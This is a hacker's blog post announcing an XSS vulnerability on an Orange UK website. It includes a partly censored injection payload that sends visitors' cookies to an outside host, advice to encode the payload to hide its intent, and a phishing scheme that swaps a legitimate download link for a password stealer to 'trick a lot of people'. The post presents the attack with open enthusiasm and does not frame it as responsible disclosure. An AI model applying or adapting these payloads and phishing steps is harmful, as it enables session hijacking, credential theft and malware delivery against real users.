Wednesday, February 1, 2012

TinKode-Orange Vulnerable to XSS and phishing


Orange Vulnerable to XSS and phishing

Posted by isrtinkode on February 19, 2010
                       ____                               _    _ _  __
                      / __ \                             | |  | | |/ /
                     | |  | |_ __ __ _ _ __   __ _  ___  | |  | | ' /
                     | |  | | '__/ _` | '_ \ / _` |/ _ \ | |  | |  <
                     | |__| | | | (_| | | | | (_| |  __/ | |__| | . \
                      \____/|_|  \__,_|_| |_|\__, |\___|  \____/|_|\_\
                                              __/ |
                                             |___/
                                            # TinKode & La Magra@ Romania
XSS – [Cross-Site Scripting]
Informations:
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications which enable malicious attackers to inject client-side script into web pages viewed by other users. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy…
More here: [ XSS ]
I just found a XSS vulnerability in website.orange.co.uk website.
Through this vulnerability, an attacker could inject HTML or JavaScript code which may lead to cookie stealing.
Proof of Concept:

Link:
http://censored/index.php?module=censored=">censored  src=javascript:censored="http://censored?censored="+document.censored+"&censored")></censored>
c0de:
"><censored" src=javascript:censored="http://censored.site.com/censored.php?censored="+document.censored>
We can encode the malicous code in base64, hex, etc in order to hide our intentions! :)
Another example for this vulnerability is phishing! :D
As everyone knows, there are programs called stealer which can steal all saved passwords from your browser.
I picked a executable program (winamp in our case) for a demonstration.
Link to download winamp: http://download.nullsoft.com/winamp/client/winamp5572_lite_en-us.exe
The malicious code:
"><censored  src="http://download.nullsoft.com/winamp/client/winamp5572_lite_en-us.exe">censored
Encoded in hex will become:

http://website.orange.co.uk/censored
Replace the winamp link with another one(eg: a stealer) and you can trick a lot of people.
Note: This isn’t the only vulnerability which I found in : orange.co.uk
#Tinkode

0 comentarii:

Post a Comment